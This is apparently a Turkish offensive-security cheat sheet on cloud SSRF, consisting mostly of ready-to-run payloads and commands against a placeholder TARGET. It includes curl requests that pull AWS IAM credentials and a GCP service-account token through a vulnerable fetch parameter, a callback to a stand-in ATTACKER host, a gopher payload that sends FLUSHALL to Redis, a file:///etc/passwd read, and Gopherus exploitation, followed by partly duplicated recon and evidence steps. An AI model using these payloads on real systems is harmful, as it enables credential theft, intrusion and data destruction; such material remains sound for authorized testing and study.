Skip to content

Cloud SSRF

web ssrf

Cloud SSRF sunucunun saldırgan kontrollü URL’ye istek yapmasını suistimal eder. Loopback, metadata ve iç servis erişimi öncelikli etkilerdir.

  1. URL alanını ve protokol desteklerini keşfet.

  2. Loopback ve cloud metadata’ya istek doğrula.

  3. Bypass (IP encoding, DNS rebinding, redirect) dene.

  4. İç servis / credential etkisini kanıtla.

http://127.0.0.1/
http://localhost:8080/admin
http://169.254.169.254/latest/meta-data/
Terminal window
ffuf -u 'https://TARGET/fetch?url=FUZZ' -w ssrf-wordlist.txt -mc all
Terminal window
curl -sk 'https://TARGET/fetch?url=http://ATTACKER/'
Terminal window
curl -sk 'https://TARGET/fetch?url=http://169.254.169.254/latest/meta-data/iam/security-credentials/'
Terminal window
curl -sk 'https://TARGET/fetch?url=http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token' -H 'Metadata-Flavor: Google'
http://169.254.169.254/metadata/instance?api-version=2021-02-01 # Azure
Terminal window
curl -sk 'https://TARGET/fetch?url=http://169.254.169.254/openstack/latest/meta_data.json'
gopher://127.0.0.1:6379/_FLUSHALL%0D%0A
dict://127.0.0.1:11211/stats
file:///etc/passwd
Terminal window
python3 gopherus.py --exploit redis

Cloud SSRF sonuçları hedef sürüme ve yığına göre değişir. Her başarılı adımı request/response ile kaydet; sonraki pivot’u not et.

Terminal window
curl -sk https://TARGET/robots.txt
Terminal window
nuclei -u https://TARGET -as -silent
Terminal window
ffuf -u https://TARGET/FUZZ -w /usr/share/seclists/Discovery/Web-Content/common.txt -mc 200,204,301,302,403
GET / HTTP/1.1
Host: TARGET
Accept: */*
Terminal window
mkdir -p evidence/web && tee evidence/web/notes.txt

Bu ekler keşif ve kanıt paketini hızlandırır; asıl sömürü üstteki bölümlerdeki konu-özel payload’larla yapılır.

Terminal window
curl -sk https://TARGET/robots.txt
Terminal window
curl -sk https://TARGET/sitemap.xml
Terminal window
ffuf -u https://TARGET/FUZZ -w /usr/share/seclists/Discovery/Web-Content/common.txt -mc 200,204,301,302,403
Terminal window
nuclei -u https://TARGET -as -silent
GET / HTTP/1.1
Host: TARGET
Accept: */*
Terminal window
mkdir -p evidence/web && tee evidence/web/notes.txt
request/response
zaman damgası
kullanılan hesap
etki özeti
Terminal window
curl -sk https://TARGET/ -D evidence/web/headers.txt -o evidence/web/body.html